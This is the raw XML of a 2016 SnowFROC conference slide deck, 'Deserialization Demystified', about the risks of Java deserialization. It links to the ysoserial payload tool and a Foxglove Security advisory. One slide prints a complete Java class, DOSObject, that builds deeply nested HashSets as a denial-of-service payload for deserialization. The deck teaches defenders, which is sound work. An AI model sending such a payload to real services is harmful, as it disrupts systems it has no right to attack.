              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186702760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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41662662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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="647971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6F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4031914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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20345699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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2749629159"/>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image" Target="../media/image1.jpg"/><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43"/>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12802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6F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23491796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 id="2147483664" r:id="rId15"/>
    <p:sldLayoutId id="2147483665" r:id="rId16"/>
    <p:sldLayoutId id="2147483666" r:id="rId17"/>
    <p:sldLayoutId id="2147483667" r:id="rId18"/>
    <p:sldLayoutId id="2147483668" r:id="rId19"/>
    <p:sldLayoutId id="2147483669" r:id="rId20"/>
    <p:sldLayoutId id="2147483670" r:id="rId21"/>
    <p:sldLayoutId id="2147483671" r:id="rId22"/>
    <p:sldLayoutId id="2147483672" r:id="rId23"/>
    <p:sldLayoutId id="2147483673" r:id="rId24"/>
    <p:sldLayoutId id="2147483674" r:id="rId25"/>
    <p:sldLayoutId id="2147483675" r:id="rId26"/>
    <p:sldLayoutId id="2147483676" r:id="rId27"/>
    <p:sldLayoutId id="2147483677" r:id="rId28"/>
    <p:sldLayoutId id="2147483678" r:id="rId29"/>
    <p:sldLayoutId id="2147483679" r:id="rId30"/>
    <p:sldLayoutId id="2147483680" r:id="rId31"/>
    <p:sldLayoutId id="2147483681" r:id="rId32"/>
    <p:sldLayoutId id="2147483682" r:id="rId33"/>
    <p:sldLayoutId id="2147483683" r:id="rId34"/>
    <p:sldLayoutId id="2147483684" r:id="rId35"/>
    <p:sldLayoutId id="2147483685" r:id="rId36"/>
    <p:sldLayoutId id="2147483686" r:id="rId37"/>
    <p:sldLayoutId id="2147483687" r:id="rId38"/>
    <p:sldLayoutId id="2147483688" r:id="rId39"/>
    <p:sldLayoutId id="2147483689" r:id="rId40"/>
    <p:sldLayoutId id="2147483690" r:id="rId41"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4400" kern="1200">
          <a:solidFill>
            <a:srgbClr val="004685"/>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12.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1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hyperlink" Target="https://twitter.com/gebl" TargetMode="External"/><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hyperlink" Target="http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/breenmachine" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/frohoff"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hyperlink" Target="https://commons.apache.org/proper/commons-collections/javadocs/api-3.2.2/org/apache/commons/collections/Transformer.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/javase/7/docs/api/java/lang/Object.html?is-external=true" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/javase/7/docs/api/java/io/Serializable.html?is-external=true" TargetMode="Externa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hyperlink" Target="https://github.com/frohoff/ysoserial" TargetMode="Externa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hyperlink" Target="https://github.com/Contrast-Security-OSS/serialbox"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7.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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9.jpg"/></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Deserialization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demystified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4989349"/>
            <a:ext cx="7772400" cy="370758"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SnowFROC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Mark Hoopes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18689885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What’s The difference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>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6704" y="2871003"/>
            <a:ext cx="3314682" cy="2486011"/>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0119" y="2871003"/>
            <a:ext cx="3255267" cy="2486011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258501" y="2042384"/>
            <a:ext cx="2118502" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Transporter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554794" y="2042384"/>
            <a:ext cx="2118502" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Replicator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5745192" y="2225630"/>
            <a:ext cx="1725283" cy="169986"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent3"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent3"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent3"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554794" y="1703102"/>
            <a:ext cx="2118502" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Synthesizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19039519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Secure Data Transmission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>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38068" y="1717823"/>
            <a:ext cx="4010932" cy="3785829"/>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0637" y="274638"/>
            <a:ext cx="8407588" cy="6318966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3140441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dirty="0" smtClean="0"/>
              <a:t>There’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Rub</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700416" y="1838325"/>
            <a:ext cx="7626350" cy="2324100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Deserializing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t> untrusted data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t> offers a wide open doorway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0"/>
              <a:t> into your application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4619244"/>
            <a:ext cx="7626096" cy="571881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="4572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n-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Well, “mostly” wide open</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3337145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err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1665041" y="1716657"/>
            <a:ext cx="5659683" cy="3807843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="dk1">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk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sz="1200" dirty="0"/>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>DOSObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> implements Serializable {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    Set root;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>DOSObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        root = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        Set s1 = root;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        Set s2 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>        for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> &lt; 100; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    	    Set t1 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    Set t2 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>HashSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    t1.add("foo"); // make it not equal to t2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s1.add(t1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s1.add(t2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s2.add(t1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s2.add(t2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s1 = t1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	    s2 = t2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12889577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So it’s easy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
